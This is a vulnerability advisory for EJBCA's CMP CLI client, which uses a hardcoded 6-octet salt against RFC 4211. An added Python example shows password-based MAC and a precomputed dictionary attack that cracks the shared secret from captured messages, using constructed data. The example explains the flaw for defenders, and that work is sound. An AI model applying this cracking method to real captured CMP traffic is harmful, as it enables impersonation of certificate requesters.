Vulnerability Information
Vulnerability Title
N/A
Vulnerability Description
The CMP CLI client in Keyfactor EJBCA before 8.3.1 uses only 6 octets of salt for password-based MAC protection, and is thus not compliant with the security requirements of RFC 4211, which might make man-in-the-middle attacks easier. CMP includes password-based MAC as one of the options for message integrity and authentication (the other option is certificate-based). RFC 4211 section 4.4 requires that password-based MAC parameters use a salt with a random value of at least 8 octets; this helps to inhibit dictionary attacks on the shared secret. Because the standalone CMP client originally was developed as test code, the salt was instead hardcoded and only 6 octets long.
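The following is an added example, not code from EJBCA, showing the RFC 4211 section 4.4 password-based MAC computation and why a hardcoded, short salt matters. The one-way function and MAC (SHA-256 and HMAC-SHA256), the iteration count, the shared secret, the wordlist, the protectedPart byte strings and the 6-octet constant standing in for the hardcoded salt are all constructed for illustration and are not EJBCA's actual values.

```python
# Password-based MAC (PBM) as specified in RFC 4211 section 4.4 and used by
# CMP (RFC 4210) for message protection with a shared secret.
# Added example, not EJBCA code. OWF/MAC choice, secret, wordlist, salt
# constant and message contents are all assumptions for illustration.
import hashlib
import hmac
import os

# Constructed stand-in for a hardcoded 6-octet salt; not the real constant.
WEAK_FIXED_SALT = b"\x01\x02\x03\x04\x05\x06"
MIN_SALT_OCTETS = 8  # RFC 4211 section 4.4 minimum


def pbm_basekey(secret: bytes, salt: bytes, iteration_count: int, owf: str = "sha256") -> bytes:
    """BASEKEY per RFC 4211 4.4: OWF(secret || salt), then OWF applied to the
    previous output until iterationCount applications have been done."""
    if iteration_count < 1:
        raise ValueError("iterationCount must be at least 1")
    k = hashlib.new(owf, secret + salt).digest()
    for _ in range(iteration_count - 1):
        k = hashlib.new(owf, k).digest()
    return k


def pbm_protect(secret: bytes, salt: bytes, iteration_count: int, protected_part: bytes,
                owf: str = "sha256", mac: str = "sha256") -> bytes:
    """MAC over protectedPart (in real CMP the DER of header and body)."""
    return hmac.new(pbm_basekey(secret, salt, iteration_count, owf), protected_part, mac).digest()


def pbm_verify(secret: bytes, salt: bytes, iteration_count: int, protected_part: bytes,
               mac_value: bytes, owf: str = "sha256", mac: str = "sha256") -> bool:
    return hmac.compare_digest(pbm_protect(secret, salt, iteration_count, protected_part, owf, mac), mac_value)


def salt_is_compliant(salt: bytes) -> bool:
    """The check the client should apply before sending PBMParameter."""
    return len(salt) >= MIN_SALT_OCTETS


def compliant_salt(length: int = 16) -> bytes:
    """Fresh random salt for every protected message."""
    if length < MIN_SALT_OCTETS:
        raise ValueError("salt must be at least 8 octets")
    return os.urandom(length)


def precompute_basekeys(salt: bytes, iteration_count: int, candidates: list) -> dict:
    """Dictionary attack, step 1: the salt travels in cleartext in PBMParameter, so the
    attacker knows it. If it never changes, the expensive iterated hashing is done once
    per candidate and the table is reused against every captured message."""
    return {pw: pbm_basekey(pw, salt, iteration_count) for pw in candidates}


def attack_with_table(table: dict, protected_part: bytes, mac_value: bytes, mac: str = "sha256"):
    """Step 2: one HMAC per candidate per captured message, no further hashing."""
    for pw, basekey in table.items():
        if hmac.compare_digest(hmac.new(basekey, protected_part, mac).digest(), mac_value):
            return pw
    return None


def demo() -> dict:
    secret = b"ejbca-cmp-test-secret"  # constructed
    wordlist = [b"password", b"cmp", b"ejbca-cmp-test-secret", b"letmein"]  # constructed
    iterations = 1000
    msg1 = b"constructed CMP ir protectedPart #1"
    msg2 = b"constructed CMP ir protectedPart #2"

    # Weak client: same salt on every message, so one table cracks both.
    table = precompute_basekeys(WEAK_FIXED_SALT, iterations, wordlist)
    mac1 = pbm_protect(secret, WEAK_FIXED_SALT, iterations, msg1)
    mac2 = pbm_protect(secret, WEAK_FIXED_SALT, iterations, msg2)
    weak_hits = (attack_with_table(table, msg1, mac1), attack_with_table(table, msg2, mac2))

    # Compliant client: fresh random salt per message. The attacker can still attack
    # each message on its own, but a table built for one salt is useless for the next.
    salt1, salt2 = compliant_salt(), compliant_salt()
    mac3 = pbm_protect(secret, salt1, iterations, msg1)
    mac4 = pbm_protect(secret, salt2, iterations, msg2)
    table1 = precompute_basekeys(salt1, iterations, wordlist)
    compliant_hits = (attack_with_table(table1, msg1, mac3), attack_with_table(table1, msg2, mac4))

    return {
        "weak_salt_compliant": salt_is_compliant(WEAK_FIXED_SALT),
        "weak": weak_hits,
        "compliant": compliant_hits,
    }


if __name__ == "__main__":
    print(demo())
```

The salt gives no secrecy (it is sent in the clear alongside the MAC); its job is to be random and long enough that precomputation cannot be amortised across messages or across deployments sharing the same client. A fixed salt removes that property regardless of its length, and 6 octets falls below the 8-octet floor the RFC sets even if it were random. The iteration count is the other lever against dictionary attacks, and it only helps if the attacker has to pay it again for every message.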
CVSS Information
N/A
Vulnerability Type
N/A
Vulnerability Title
EJBCA Security Vulnerability
Vulnerability Description
EJBCA is open-source public key infrastructure (PKI) and certificate authority (CA) software from Keyfactor. Versions of EJBCA before 8.3.1 have a security vulnerability: the salt length used by the CMP CLI client does not meet the security requirements of RFC 4211, which can make man-in-the-middle attacks easier.
CVSS Information
N/A
Vulnerability Type
N/A